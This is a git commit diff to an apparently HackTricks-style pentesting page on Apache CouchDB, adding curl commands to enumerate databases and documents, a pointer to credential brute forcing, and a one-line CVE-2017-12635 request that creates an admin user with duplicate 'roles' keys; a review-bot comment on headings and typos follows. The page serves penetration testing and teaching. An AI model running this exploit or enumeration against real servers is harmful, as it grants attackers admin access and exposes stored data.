GitBook: [master] one page modified

CPol 2020-07-16 17:00:59 +00:00 committed by gitbook-bot
parent 28c92fde10
commit 3c305687ca
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF

@ -13,86 +13,95 @@ PORT STATE SERVICE REASON
5984/tcp open unknown syn-ack
```
## **Enumeration**
### **Automatic**
## **Automatic Enumeration**
```bash
nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
msf> use auxiliary/scanner/couchdb/couchdb_enum
```
### Manual
## Manual Enumeration
### Banner
```text
curl http://IP:5984/
```
This issues a GET request to installed CouchDB instance.
The reply should look something like:
This issues a GET request to installed CouchDB instance. The reply should look something like on of the following:
```bash
{"couchdb":"Welcome","version":"0.10.1"}
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```
#### **Database List**
### **Database List**
```text
curl -X GET http://IP:5984/_all_dbs
```
If that request responds with a 401 unauthorised, then probably you would need some valid credentials to access the database:
If that request **responds with a 401 unauthorised**, then you need some **valid credentials** to access the database:
```text
curl -X GET http://user:password@IP:5984/_all_dbs
```
### \*\*\*\*[**Brute force**](../brute-force.md#couchdb)
In order to find valid Credentials you could **try to** [**bruteforce the service**](../brute-force.md#couchdb).
Once you have some **valid credentials** \(or if valid unauthenticated access\) the response to _/\_all\_dbs_ should be a list of db names like:
This is an **example** of a couchdb **response** when you have **enough privileges** to list databases \(It's just a list of dbs\):
```bash
["baseball", "plankton"]
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```
#### **Document List**
### Database Info
```text
You can obtain some database info \(like number of files and sizes\) accessing the database name:
```bash
curl http://IP:5984/<database>
curl http://localhost:5984/simpsons
#Example response:
{"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"}
```
### **Document List**
```bash
curl -X GET http://IP:5984/{dbname}/_all_docs
```
Response
```bash
{
"offset": 0,
"rows": [
{
"id": "16e458537602f5ef2a710089dffd9453",
"key": "16e458537602f5ef2a710089dffd9453",
"value": {
"rev": "1-967a00dff5e02add41819138abb3284d"
}
},
{
"id": "a4c51cdfa2069f3e905c431114001aff",
"key": "a4c51cdfa2069f3e905c431114001aff",
"value": {
"rev": "1-967a00dff5e02add41819138abb3284d"
}
},
],
"total_rows": 2
}
curl http://localhost:5984/simpsons/_all_docs
#Example response:
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
```
#### **Read Value Document**
```bash
curl -X GET http://IP:5984/{dbname}/{id}
curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
#Example response:
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
```
## Local Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)
Thanks to the differences between Erlang and JavaScript JSON parsers you could **create an admin user** with credentials `hacktricks:hacktricks` with the following request:
```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json"
```
\*\*\*\*[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html).
## References
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
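Review bot: The new heading "## Local Privilege Escalation CVE-2017-12635" near the end of the hunk labels the issue as local, but the request shown under it is a plain HTTP PUT to port 5984 with no credentials in it, so the heading understates who is exposed; "Privilege Escalation" without "Local" would match the example. The section also gives no affected version range or fix, which a reader needs in order to compare against the `version` field returned in the Banner step. Smaller points in the same hunk: "look something like on of the following" should read "one of the following"; "#### **Read Value Document**" is still a level-4 heading while the sibling sections were moved to "###"; and the "\*\*\*\*" prefix before "[**Brute force**]" and before "[**More information about this vuln here**]" will render as literal asterisks and should be dropped.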